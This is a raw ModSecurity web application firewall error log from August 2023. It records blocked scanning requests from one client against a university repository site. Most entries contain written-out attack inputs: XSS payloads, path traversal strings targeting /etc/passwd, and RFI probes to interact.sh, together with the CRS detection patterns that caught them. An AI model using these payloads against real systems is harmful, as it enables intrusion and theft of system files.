[tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAnoOrIAAAAf"]
[Tue Aug 29 11:52:26.619383 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAn96BMAAAAD"]
[Tue Aug 29 11:52:26.628664 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAoQ3IEAAAAN"]
[Tue Aug 29 11:52:26.642323 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAlIBmcAAAAn"]
[Tue Aug 29 11:52:27.583709 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoQ3IMAAAAN"]
[Tue Aug 29 11:52:27.605641 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAoMLa4AAAAH"]
[Tue Aug 29 11:52:28.552993 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAoQ3IUAAAAN"]
[Tue Aug 29 11:52:28.682885 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoQ3IYAAAAN"]
[Tue Aug 29 11:52:29.581583 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAfWOOEAAAAL"]
[Tue Aug 29 11:52:30.572765 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAnn2D0AAAAe"]
[Tue Aug 29 11:52:33.564052 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAoLfGoAAAAG"]
[Tue Aug 29 11:52:33.717718 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAnd3H0AAAAI"]
[Tue Aug 29 11:52:33.744039 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAjdQdgAAAAZ"]
[Tue Aug 29 11:52:34.542927 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoPuVUAAAAM"]
[Tue Aug 29 11:52:34.656306 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAnd3IEAAAAI"]
[Tue Aug 29 11:52:37.535206 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAoUJagAAAAB"]
[Tue Aug 29 11:52:37.561604 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoO50kAAAAK"]
[Tue Aug 29 11:52:37.636784 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAoPuWIAAAAM"]
[Tue Aug 29 11:52:40.635814 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoO51YAAAAK"]
[Tue Aug 29 11:52:40.679785 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoLfIwAAAAG"]
[Tue Aug 29 11:52:41.764067 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAnHQmwAAAAT"]
[Tue Aug 29 11:52:42.530516 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnjjS0AAAAX"]
[Tue Aug 29 11:52:43.550478 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAnTlTwAAAAA"]
[Tue Aug 29 11:52:44.864302 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAoW7IQAAAAJ"]
[Tue Aug 29 11:52:45.583832 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAlUlwIAAAA0"]
[Tue Aug 29 11:52:46.854141 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAnd3L8AAAAI"]
[Tue Aug 29 11:52:46.879962 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAoO538AAAAK"]
[Tue Aug 29 11:52:47.618976 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoGFbEAAAAE"]
[Tue Aug 29 11:52:48.527642 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15oMCo-f0AAAnd3MYAAAAI"]
[Tue Aug 29 11:52:48.779770 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoPuZUAAAAM"]
